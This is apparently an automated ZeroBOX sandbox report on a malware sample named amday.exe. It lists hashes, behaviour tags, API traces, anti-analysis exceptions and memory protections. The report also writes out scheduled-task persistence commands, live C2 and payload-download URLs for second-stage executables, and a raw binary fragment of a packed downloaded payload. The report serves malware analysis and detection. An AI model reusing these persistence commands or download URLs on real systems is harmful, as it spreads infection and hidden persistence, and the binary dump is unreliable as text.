Summary | ZeroBOX

amday.exe

UPX Malicious Packer VMProtect Downloader HTTP ScreenShot Create Service KeyLogger Internet API P2P DGA Hijack Network Http API persistence FTP Socket Escalate priviledges DNS Code injection PWS Sniff Audio Steal credential AntiDebug AntiVM
Category Machine Started Completed
FILE s1_win7_x6401 Nov. 6, 2023, 9:43 a.m. Nov. 6, 2023, 9:45 a.m.
Size 5.2MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 3e478dcc2a01b6115012627f06045690
SHA256 06de55c057b8778e494903b3da7588e4c9d1cec766f969000d7986ed31f213cb
CRC32 FED1A118
ssdeep 98304:y6fw/xdWJY6iIF7yKZm4deNzzt2ydOt7FECnxInG99CW:Tw/xzwGGdIDYpFwnCL
Yara
  • UPX_Zero - UPX packed file
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

IP Address Status Action
164.124.101.2 Active Moloch
185.172.128.100 Active Moloch
45.79.14.106 Active Moloch
64.34.75.145 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "Utsysc.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The system cannot find the path specified.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: Could Not Find C:\Users\test22\AppData\Local\Temp\s28s.2
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: SUCCESS: The scheduled task "YKM" has successfully been created.
console_handle: 0x00000007
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section .zip#**.
resource name TIS
resource name None
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
clips+0x368b75 @ 0x15c8b75
clips+0x36bc62 @ 0x15cbc62

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc000008e
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 3144952
registers.edi: 19542016
registers.eax: 3144952
registers.ebp: 3145032
registers.edx: 2130566132
registers.ebx: 20334216
registers.esi: 1995994155
registers.ecx: 2668888064
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed e9 1f 92 02 00 c3 e9 d2 83 f9 ff f5 8b 62 91
exception.symbol: clips+0x39747f
exception.instruction: in eax, dx
exception.module: clips.exe
exception.exception_code: 0xc0000096
exception.offset: 3765375
exception.address: 0x15f747f
registers.esp: 3145072
registers.edi: 4861434
registers.eax: 1750617430
registers.ebp: 19542016
registers.edx: 22614
registers.ebx: 2147483650
registers.esi: 19916755
registers.ecx: 20
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed e9 1f 09 07 00 1a 37 88 23 ff ff 1e ce cd 35
exception.symbol: clips+0x32daf0
exception.instruction: in eax, dx
exception.module: clips.exe
exception.exception_code: 0xc0000096
exception.offset: 3332848
exception.address: 0x158daf0
registers.esp: 3145072
registers.edi: 4861434
registers.eax: 1447909480
registers.ebp: 19542016
registers.edx: 22104
registers.ebx: 2256917605
registers.esi: 19916755
registers.ecx: 10
1 0 0

__exception__

stacktrace:
ykm+0x368b75 @ 0xd48b75
ykm+0x36bc62 @ 0xd4bc62

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc000008e
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 2226576
registers.edi: 10629120
registers.eax: 2226576
registers.ebp: 2226656
registers.edx: 2130566132
registers.ebx: 11421320
registers.esi: 1995994155
registers.ecx: 2978152448
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed e9 1f 92 02 00 c3 e9 d2 83 f9 ff f5 8b 62 91
exception.symbol: ykm+0x39747f
exception.instruction: in eax, dx
exception.module: YKM.exe
exception.exception_code: 0xc0000096
exception.offset: 3765375
exception.address: 0xd7747f
registers.esp: 2226696
registers.edi: 3288568
registers.eax: 1750617430
registers.ebp: 10629120
registers.edx: 22614
registers.ebx: 2147483650
registers.esi: 11003859
registers.ecx: 20
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed e9 1f 09 07 00 1a 37 88 23 ff ff 1e ce cd 35
exception.symbol: ykm+0x32daf0
exception.instruction: in eax, dx
exception.module: YKM.exe
exception.exception_code: 0xc0000096
exception.offset: 3332848
exception.address: 0xd0daf0
registers.esp: 2226696
registers.edi: 3288568
registers.eax: 1447909480
registers.ebp: 10629120
registers.edx: 22104
registers.ebx: 2256917605
registers.esi: 11003859
registers.ecx: 10
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://185.172.128.100/u6vhSc3PPq/index.php
suspicious_features GET method with no useragent header suspicious_request GET http://tinsignsnmore.com/clips.exe
suspicious_features GET method with no useragent header suspicious_request GET http://cynorix.com/mnr.exe
request POST http://185.172.128.100/u6vhSc3PPq/index.php
request GET http://tinsignsnmore.com/clips.exe
request GET http://cynorix.com/mnr.exe
request POST http://185.172.128.100/u6vhSc3PPq/index.php
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024b0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1452
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000046c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2720
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00250000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76faf000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76f20000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0129a000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0128a000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0128a000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 69632
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0128a000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 744
region_size: 2555904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000b40000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 744
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000d30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 744
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3ba1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 744
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef423b000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 744
region_size: 1769472
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000024e0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 744
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002610000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 744
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3ba2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 744
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3ba2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 744
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3ba2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 744
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3ba2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 744
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3ba2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 744
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3ba2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 744
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3ba2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 744
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3ba2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 744
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3ba2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 744
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3ba2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 744
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3ba2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 744
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3ba4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 744
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3ba4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 744
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3ba4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 744
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3ba4000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 744
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 744
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe9441a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe9442c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe94600000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 744
region_size: 1880064
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe94601000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe94840000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe944cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe944f6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe944d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe9442d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 744
region_size: 40960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe94841000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe9441b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe9484b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
description YKM.exe tried to sleep 197 seconds, actually delayed analysis time by 197 seconds
name RT_VERSION language LANG_KOREAN filetype data sublanguage SUBLANG_KOREAN offset 0x0083fe60 size 0x00000300
file C:\Users\test22\AppData\Local\Temp\s28s.0.bat
file C:\ProgramData\SMUCCI\YKM.exe
file C:\Users\test22\AppData\Local\Temp\1000001001\clips.exe
file C:\Users\test22\AppData\Local\Temp\1000004001\mnr.exe
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /RL HIGHEST /tn "YKM" /tr C:\ProgramData\SMUCCI\YKM.exe /f
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe" /F
cmdline schtasks.exe /create /sc MINUTE /mo 1 /RL HIGHEST /tn "YKM" /tr C:\ProgramData\SMUCCI\YKM.exe /f
file C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe
file C:\Users\test22\AppData\Local\Temp\1000001001\clips.exe
file C:\Users\test22\AppData\Local\Temp\1000004001\mnr.exe
file C:\Users\test22\AppData\Local\Temp\s28s.0.bat
file C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe
file C:\Users\test22\AppData\Local\Temp\1000001001\clips.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000001001\clips.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000001001\clips.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000004001\mnr.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000004001\mnr.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\s28s.0.bat
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\s28s.0.bat
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: schtasks.exe
parameters: /create /sc MINUTE /mo 1 /RL HIGHEST /tn "YKM" /tr C:\ProgramData\SMUCCI\YKM.exe /f
filepath: schtasks.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x024b0000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL(Aeà Œ\²#Á @@ÅÔmM@¸‡ÀŒ0à èLÃÄ€wD ±‹ ` r @@ Ì°@À ˜Ð@@ ì&à@@.imports@À.%‹¿/ @@.themida€>0`à.bootX%°B``.%‹¿/Ðh `.vmp0]] h `.vmp1Ì€w@À.vmp2sKwtK `.relocÄÃzK@@.rsrc 0ÃT”K@@„fxô%¸ ¼¶Pz¸øb·ºj¦Â(&½æ+»š®ÀŠ%zIä;´êû­K…̺lâ7Ù:߈ïð7§?X鈮[ã;£œ\!²:];´ý±_Îõä¿|P­Ü—'4 äÁ`™K햪~(i j恨R *w,qç  |èç Àƒ -þIô_…ÙÁ¯Áoä-ˆH¢˜Ûÿÿÿë]”$í'Pß ŒÞª­”nO·/ÎÁÞA6NɁ©>4qtw‚ç  Æ…‰×ç ‘:Üa¿~âw™Ûç ä÷ªáæ T…67$y"4fu(cZ«°í®íYÃЍÎWÇR° Õç  “xùhV]}wy)ç  ü¤ç az҈ËRaðô_xåŸÓcSäô_ÛȕÞÿ\DRAGÍ~Ú•C‡œÁ‚Kã•È‹ñ™o ç  aB\{ kˆ`}Uä­üY‹Ä…‹Aô_<ê‹Òùî†D½²ˆ¿J þëëtÊm;gÏöŸÜ®(BŽô_?,q:æåÜâ 9Z¡¢ÿ¤Þ¶,?b)°±²“¤XÀµ¶¾]‡o±Žôß9Z¤Ùó¢µ}<Y!Ä~ÿÿWŸ›˜Ñü‰“.Ú*—<z•'Å/:²zW.c)yÐh˜8­è¥æ8:©…;EŠ|êÅÊíÒe2Ü¥C͂ ,‚ %ÂÍê­²(ý­~&rÓhoéD,íåíZ@•‹íŠ“S¤ž«ET4¼­²5åêK]OEªœ´&Ô«+ô“Ä+i?ÙV€cÀ9/a8!_¥Ú9ÜÊEø8¨ÇIÿè?Ç ×PWò,9aS¯~&ÚvãLàáéÆ ¯ E§°§˜Ö©>®Û¬¨×R‚©Zkn¬¨/h©±~È÷@ U÷vw˜þÂЍ…®…2ÅfÿÀÁè0þÂÁøÄÐÂ2ÚÔ+ÀfÁø©ÂèTVBÁèh±L, 3ÃAh>â5‹ÊÍJ÷T$d$ …íA[h¾þ N÷Љd$éEA½0%ˆ·ÅU´nŸµïòf1¬ìÖ¾Ë–À¶„n µïò2ÃMfÁåM4é>+·ÊŽ>¸F‹òJ‹”¤k‹HÁæpèÇGèM@ à§ØÇË%8#ôÓÜ4ÃÔ:Côƒ½üúd;«Œ£Üañ9äO8iϞÈ9˜We9×~R•Qà~XŠŸ^‡ÂjyàÙPJñؽFô:+‰¥ÀõÊû_ÊKÚYò¡æäMËf…8\ºl©5üs€®(Å{ÉY&¶ÓÙÝþÿÿÿ뢑3½£Ýü{¹þžûcÆĶ#ܙN$ÑË1éo ?a~P 4Ûí4åR§ ^nleîÈ1ûâ4ñ-¿(É_78y43¥§ ^Ãj¯ïEù2g™d®¸³‘ñH™0Ú1ÊÃæ=o©õHûbÿ~„Δ”QÍïL¤_¬46h§ ^#’+]xã@ٖó™ 0Á/<àvO¶G®„'\•°Ôïöu©Ÿsæs¸7…¼Ös4î¯4_§ ^´ ã•Ãúƒ˜fƒø1”羃 7³[ši||ˀ]ú¢¬°8Wñ°¢¡1 ^|úQQ”H’¤Ì‰¡2¢ü¬1 ^GºpF½ÊS˜ª½ÑJSÝ ,ê¶K°¼ªÞåzƒXÄ ‚2 2@ÕÆG½ˆÛã‹ä™cá°"¨PÅHÁ½n9½Ú(M«}zòã sÃ^»Ëùûo"­;¤ãt~ìUä“tÚÅ{ÄDcEè>¸¦× C?܉>hgøH_X¶ÏÙ_áà7UÆ?–‰ƒÙ©~&è®ï_? SË ë^[­[lTÅåâՐÿ®'¶ãѯàá™L¦®ïXB@1÷Ø u ¯4KíòU2<U#õ{ReRüåã}3á†>ßj?lÚ,“ôûÄR´ŠË 倩~&(—S¨N>ý¨í; ÚRCLÃä6¡³¯?Õ® ,tŒåJUÒðå êuës³3–Tžé¯×¾1™oðM>§I? wVÀ]õ>Ðs?#ýU#>5"%ê"ÅʵR-"ÊýÊ4U2¬~¸Š¨~ &Þ³WN ÕæV=:;¸ÓêÑšEûÀ4¯~hŸœWž裠fô–ò¯N ¢6N ½¢YÓgÐù±_]]^¬‚×Ûiøy±NŒâ‡yžÿÿÿëö¨–@–0~w±ZBBe¾+•æÀF ¶8w؝Oַχ¥Ÿ®`øý¯^®±k®ÜM¯ËÄؖ>&Í ÁÑt•é¨•âtN ®´y\‡+LaÜ6@›¦›–«^ ÄÄjÚÔsUýª¨»)y'N ŒËN ã@ÑÔ/¶^€o±_Æ07Pā§ÿ¤ôo±_&…5Îïø o±ß¯qÓ´F8ÁCa¨P„TÝZÐ}’íJX]M—È<ˆ§qÞ[=;DãŒÂ˼ë´$2´[£„«$p¦<­5=3dýœ Ì1k«~&äUR•ÙAXWØ8ÏŪ¬†¼­d}â|”lÌY<ÚË«ôŠE*hš¬á#²ãù¶­oW_ª)<yf–°qÉÞÙǶ`ÆYé ¦>©îÑèŽ=C<u:”:MƒÊ dª~&©æú»T NŒnϙ^&ª­欯šŸih`ˆ‰q¡FtÖW¦®§èGǚý­†´;è«cH^Ë31ï2ÉO‘Oˆ3͂ L²ŒÍ;è{2+ż»¤[»}Ã=\ ì²£„ؐâ7‹aÿÿÿè6](öô±_UŒÎö@û¹í½ô±_‚¡yiMƙ¥p[þÿÿ¿ÙÕ|Æ+} ô±_ò‰À†7[þÿÿßÙ$ ô²öv,[þÿÿÙl£OÁPô±_ó¦…ëN+[þÿÿ¿ÙŽw1öÎ[þÿÿ?Ù&Öm/~ïÚkY[þÿÿŸÙ²²ô±_ŸÀ…{![þÿÿÿجTÊÎæè¢Ç[þÿÿÙòé.Ã[þÿÿ¿Ø»\æ›kýô±_Çþ=±"ÈýL~[þÿÿ?ÙË2+Átžs;ÊÕREªlí%§]¢¢šª ª„¢'H£‘žÈ÷@êè¢d¦£Jzu›Êû2›^3qNÁT2RdÒ ]ʍ¢Ä å[¥ZºmJY£~°=¢€k¸ŸÂD ôf†þfÃñ‡¸ÈµÇšh†°& Ø0È?'fà¯7.Aþ~Û^hÙI։4èkƒ¹¿u(@f¶”AŠ×¿ŠŒCŠ×¿è“+D>óâÿÐPÒÛ ÷`¾“r§X JŸnŠr€~.ªWñ¥- ¦3ÙÑU¨¨%vñ#Lêҝ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

